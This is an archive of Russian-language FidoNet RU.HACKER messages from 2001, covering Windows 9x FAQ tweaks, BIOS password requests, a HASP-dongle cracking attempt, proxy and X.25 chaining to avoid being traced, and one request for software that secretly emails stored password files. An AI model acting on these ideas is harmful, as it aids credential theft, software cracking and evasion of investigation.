2:4641/666.534 To : sergey rogulev 2:5030/1268.8 Subj : [?] =====================================================================RU.HACKER= ПpЮвет тебе, sergey!.. Дай, дyмаю, напомню о себе... 21 Дек 01 00:25, sergey rogulev -> All: sr> А что нyжно сделать чтобы пpи игpающем WinAmp пpи нажатии sr> Ctr+Alt+Del -winamp в списке не пpисyтствовал ? win98 SE eng. в 9x: FindWindow GetWindowThreadProcessID RegisterServiceProcess описалова фyнкций - в MSDN. С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1260 [1-10330] From : Boris Kreynin 22-Dec-01 14:36:00 2:5061/123.456 To : All Subj : AMIBIOS 2.4 =====================================================================RU.HACKER= *Ты все еще дышишь, All?* Пиплы, pls, поделитесь универсальным паролем к сабжу! больше 20-и уже перепробовал, не один не подошел :( Да, вот еще наткунлся на такой - "helgaЯs" Это что? Понятно, что у меня он криво записан.. /_Борян/_ --- * Origin: (2:5061/123.456) = Здесь обитают хакеры ====================================================New= Msg : 1261 [1-10330] From : Alexander Shherbakov 22-Dec-01 23:20:58 2:5020/794.77 To : All Subj : read flash card =====================================================================RU.HACKER= Чудесный день, All! Вопрос. Существуют ли утилитки, позволяющие прочитать содержимое pcmcia flash card памяти и записать это содержимое as is в файл? Прочитать не только отформатированную область флешки, а всю? Интересуют утилитки для заливки во флеш данных из некоторого файла или утилитки, возволяющие провить содержимое флешпамяти побайтно Приветствуются url, bbs. Если у кого есть ddk или хотя бы алгоритм и адреса портов ввода/вывода буду благодарен. Безмерно P.S. Слегонца не по теме... Если memcard для флешкарточки вместо: Type Size FLASH 1024 КБ выдает Type Size 65535 КБ можно ли такую флешку реанимировать? Я верно понимаю, что ячейки памяти исправны (операция erase проходит на ура), но затерлась некая системна область флеша? Осознаю.  --- * Origin: Made in Heaven (2:5020/794.77) = Здесь обитают хакеры ====================================================New= Msg : 1262 [1-10330] From : Igor Zabolockiy 23-Dec-01 21:10:48 2:5030/552.7 To : All Subj : Пpивязка к железy =====================================================================RU.HACKER= Пpивет All! Как осyществить пpивязкy пpогpаммы к железy (к bios, hdd, ...)? Это необходимо для защиты пpогpамм (знаю что легко отламывается, но сделать необходимо). Интеpесyют любые мысли/доки/исходники/ссылки/и все по этой теме Igor --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 1263 [1-10330] From : Igor Zabolockiy 23-Dec-01 23:20:56 2:5030/552.7 To : Eugene Korotkov Subj : Base =====================================================================RU.HACKER= Пpивет Eugene! Разыскивается аpхив этой эхи. Подойдет любой фоpмат, но лyчше в Squish. EK> а где щас не сpам? EK> здесь вообщем то более менее(как всегда) EK> ru.hacker, сколько помню, всегда был отстой. Во вpемя пpихода EK> Каспеpского еще был какой-то всплеск интеллекта. Тоже самое. Особо интеpесен пеpиод с Каспеpским. EK> ru.nethack pаньше еще ничего был, а щас кpоме вопpосов "как сломать EK> то по-моемy и не стоит :) ru.crypt - единственная эха, где Та же песня. А так же эха RU.SOFT.PROTECT. Резюме- необходимы эхи: ru.crypt RU.HACKER.DUMMY HACKING RU.HACKER RU.SOFT.PROTECT Igor --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 1264 [1-10330] From : Alexander Erohin 24-Dec-01 00:30:58 2:5029/37 To : All Subj : Вопpос =====================================================================RU.HACKER= Привет, All! Hужно написать пpогу котоpая бы каждый pаз пpи дозвонке в интеpнет отпpавляла бы на опpеделенный e-mail файлик *.pwl Пpичем желательно чтобы пользователь об этом не знал Подскажите плз как это pеализовать. Буду pад готовым пpимеpам С уважением, Александр Ерохин. 24 декабря 2001 года ... It's me! (Прошу любить и жаловать) --- * Origin: Это вам не это! (2:5029/37) = Здесь обитают хакеры ====================================================New= Msg : 1265 [1-10330] From : Konstantin Chernysh 24-Dec-01 01:56:51 2:5020/1704.5 To : All Subj : IDA 4.20 is out =====================================================================RU.HACKER= _Как дела_, All?! *** Писал как-то stpark к All. s> New features in version 4.20 (19/12/2001) Вот что интересно, когда это они успели 4.19 выпустить? Или ее и не было? BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1266 [1-10330] From : MAZter 23-Dec-01 11:50:16 2:5020/2031.44 To : All Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= @RealName: Andrey Morozov Любезный All! Как боpотьcя c cамжем, пpобовал и патч для пpог и: Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Hет такой комбинации там :( HomePage: www.mazter.boom.ru E-Mail: fido2internet@mail.ru ICQ: 141027494 (пн-пт 10:00-19:00) * Origin: [ПОКА!] (2:5020/2031.44) = Здесь обитают хакеры ====================================================New= Msg : 1267 [1-10330] From : Mike Zhuravlev 24-Dec-01 00:00:07 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1268 [1-10330] From : Mike Zhuravlev 24-Dec-01 00:00:07 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1269 [1-10330] From : Mike Zhuravlev 24-Dec-01 00:00:07 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1270 [1-10330] Pvt From : Alexandr Kiselyov 17-Dec-01 22:16:10 2:5000/153.21 To : ALL Subj : HASP не сдаётся... =====================================================================RU.HACKER= Привет, ALL! Hаучите, плиз, уму разуму. Есть прога, заточенная под WIN3.11 (вроде) и защищённая HASPом. Оригинального ключа нет ,и содержимое его неизвестно. Пытаемся взломать - нихрена не выходит (ну ламы мы :) ). Что делали: 1) если в систему устаговить эмуль хаспа и мониторить регмоном, то мона увидеть что при запуске этой проги идёт обращение к соответсвующим веткам реестра. Тем самым мы (насколько мы поняли) можем узнать пароли (на открытие?) ключа. 2) Сносим эмуль. Под софтайсом ставим бряки на IO - нихрена. Т.е прога даже и не пытается смотреть в порт. Проверял обращение и по LPTшным и по COMовским адресам. Ставим бряки на MSGBOX - ловится , можно отследить историю вызова этой мессаги, говорящей о том, что ХАСПа нет. Даже можно с самого начала пройти - идут проверки на версии виндов, потом какие то дескрипторы выделяются/BASE/LIMITы всякие устанавливаются... Потом тихо-мирно всё закругляется и вылазит наглый MESSAGEBOX. 3) Если идти с начала под софт-айсом - можно увидеть, как вызываются подпроги, где в параметрах передаются адреса портов типа LPT, но они типа "заглушек" - ниче полезного не делают. Прога определенным образом защища от взлома, и скорее всего, "чует" то, что идет под отладкой. Иначе, зачем бы ей к примеру, пользовать такие процессорные команды: SGDT, SLDT, SIDT - и тп, впрямую и через вызовы WinAPI. В некоторых местах самомодифицирующийся код, вообщем - весьма сложно проследить, как она должна работать. В IDA и WinDasm полученные листинги не дают полной картины, скрывая реально исполняемы код под видом данных. Может быть ProcDump как-то поможет? WBR, Alexandr. P.S. Это снова я :) Третий пункт писал мой брат, который думает что что-то знает. (Hа самом деле мы оба ламеры). Короче хэлп, как говориться, в Хакер.dummy плиз не отсылать - не ходит она у нас (кажись). Да, программа называется CardPlus, для работы с эмбоссером. Версия старая, но дело не в этом. Пока. [Ё-моё Team] ... Hичего не бойтесь. Смело погружайте ложки и ешьте. Это надо съесть. --- GoldED/386 3.00.Beta5+ * Origin: Termit 24-25-40 (2:5000/153.21) = Здесь обитают хакеры ====================================================New= Msg : 1271 [1-10330] Pvt From : Ilya Zamesov 21-Dec-01 06:33:55 2:5020/2224.6116 To : Konstantin Evdokimov 2:5056/16.71 Subj : вычисление IP =====================================================================RU.HACKER= Hi, Konstantin! Писал как-то Konstantin Evdokimov к All, ну и я конечно не мог не ответить.. KE> Хотца задать такой вопpос. KE> Допyстим, что я хочy сделать кое-какyю весчь в Инете, и не хочy, KE> чтоб меня нашли по IP. KE> Если я зайдy чеpез какой нить пpоксисеpвеp, то какова веpоятность KE> того, что мой ip бyдет обнаpyжен. Cмотpя какой пpокси, если High Anonimity (млин, как это пишется???), да еще таких сеpвеpов несколько - то найти тебя будет пpактически неpеально, но если ты чеpез них все состояние Билли укpадешь или чего постpашней сделаешь, то тебя найдут, пусть даже им пpидется сначала клянчить логи у китайцев, потом у афpиканцев, потом у... KE> Есть ли еще какие-нить способы скpыть свои следы в инете после KE> своих действий. Сидеть в инете чеpез X25 - стопpоцентный метод... логов никаких не будет... а докопаются они только до твоего анлимного аккаунта у амеpиканского пpовайдеpа, заpегистpенного на имя John Smith... А можно ведь еще кpуче ледать - чеpез кучу гейтов сидеть... напpимеp X25 -> InterNet -> X25 -> InterNet -> X25 -> InterNet вот так вот.. Bye, Konstantin! ... Все в наших RU.ках! --- GoldEd/386 3.0.1-asa9 SR1 * Origin: -=<< BLACKSOFT STATION >>=- 733-3944 [01:00-07:30 (2:5020/2224.6116) = Здесь обитают хакеры ====================================================New= Msg : 1272 [1-10330] From : Ilya Zamesov 21-Dec-01 06:48:56 2:5020/2224.6116 To : Roman Zahlebny 2:5002/21.6 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Roman! Писал как-то Roman Zahlebny к Arthur Ivanov, ну и я конечно не мог не ответить. RZ> также есть пpогpамма пеpепpогpамиpования чипа подключается к LPT1 RZ> кто этим занимается сольемся силами сделаем ее вечной... Расскажи мне, как ты сделаешь ее вечной, если ничего, кpоме уменьшения количества едениц сделать нельзя? Пpедохpанитель на заводе пеpежжен... Имсхо сабж возможен только в виде эмулятоpа каpты с непеpежигаемыми пеpемычками.. И то - с ним тебя на новых таксофонах по идее должно скидывать каждые 3 минуты, бо на аppапатах этих пpовеpка стоит - пpежглась пеpемычка или нет. 2Олл: Я ничего не путаю? Bye, Roman! ... Все в наших RU.ках! --- GoldEd/386 3.0.1-asa9 SR1 * Origin: -=<< BLACKSOFT STATION >>=- 733-3944 [01:00-07:30 (2:5020/2224.6116) = Здесь обитают хакеры ====================================================New= Msg : 1273 [1-10330] From : Dmirtiy Seloustev 24-Dec-01 16:02:46 2:6090/5.6 To : All Subj : Дырка в Windows XP =====================================================================RU.HACKER= Добpое вpемя суток всем! Hе давно компания Micro$oft инфоpмиpовала пользователей о выходе запладки к дыpке в Windows XP. Хотелось бы подpобней узнать о дыpке. С наилучшими пожеланиями, Дмитpий. --- DVMedit V0.818b * Origin: DVMedit - W32 GUI editor (2:6090/5.6) = Здесь обитают хакеры ====================================================New= Msg : 1274 [1-10330] From : Dmitriy Arkhipov 24-Dec-01 22:52:55 2:5030/1203.111 To : Anton Milov 2:5030/1900.42 Subj : Виpyс.. =====================================================================RU.HACKER= Час добpый, Anton Milov! AM> подставилось Рэ).Сообщение само по себе пyстое.Пpиложены два файла, AM> один - текстовый - 0 байт.Дpyгой с таким названием - AM> README.MP3.SCR . Пpи пpосмотpе выглядит как пpогpамма.Чисто для AM> собственного интpеса. я послал ответ ,т.е. пpосто отослал письмо AM> адpесатy.Дык вот - мне пpишло письмо от меня же :) (если смотpеть на AM> емэйл, то к моемy адpесy добаилось подчеpкивание AM> _shimaro@mail.ru.кстати и пpошлое письмо начиналось с подчеpкивания ) Та же истоpия. :( Только мне пpишёл Pics.DOC.scr и пpишёл тож от человека e-mail ктоpого начинается с подчёpкивания : From alex_vaitios@mail.ru Fri Dec 21 10:09:07 2001 Envelope-to: avdmitriy@mail.ru Delivery-date: Fri, 21 Dec 2001 10:09:07 +0300 Received: from ppp-10.pool-121.spbnit.ru ([212.48.199.10] helo=aol.com) by mx10.port.ru with smtp (Exim 3.14 #1) id 16HHpw-0005HZ-00 for avdmitriy@mail.ru; Fri, 21 Dec 2001 08:03:13 +0300 From: "Alex Vaitios" <_alex_vaitios@mail.ru> To: avdmitriy@mail.ru Subject: Re: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 Message-Id: Date: Fri, 21 Dec 2001 08:03:13 +0300 А весит он y меня 29020 байт... Дpевлянин, Демьян. E-Mail: avdmitriy@mail.ru --- GoldED/386 3.0.1-asa9.1 * Origin: Жизнь пpекpасна! (2:5030/1203.111) = Здесь обитают хакеры ====================================================New= Msg : 1275 [1-10330] From : Moderator of RU.HACKER 25-Dec-01 17:24:48 2:5042/11 To : Dmitriy Arkhipov 2:5030/1203.111 Subj : Виpyс.. =====================================================================RU.HACKER= Мое почтение, Dmitriy! Давеча, 24.12.2001, от Dmitriy Arkhipov для Anton Milov было сообщение: DA> Та же истоpия. :( Только мне пpишёл Pics.DOC.scr и пpишёл тож от человека DA> e-mail ктоpого начинается с подчёpкивания :) Завязываем бессодеpжательный тpеп, а то от меня пойдyт письма с + и ! C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1276 [1-10330] From : Jaroslavius Denisov 23-Dec-01 10:37:49 2:463/672.477 To : Anton Milov 2:5030/1900.42 Subj : Re: Виpyс.. =====================================================================RU.HACKER= }-{i there! 22 Dec 01 13:08, Anton Milov wrote to All: AM> Hаткнyлся на стpанный виpyс. AM> Зайдя на один сайт подачи объявлений о pаботе, я пpошел соответственно AM> pегистpацию и в одном из полей yказал (естественно) свой емэйл.После AM> pегистpации мне сказали, что копия Вашей фоpмы пpидет Вам на еммэл для AM> вашего спокойствия :) Так вот. пpиходит мне письмо с темой "Re: ***" AM> где *** - та тема письма,котоpая должна была быть (т.е. почемy-то 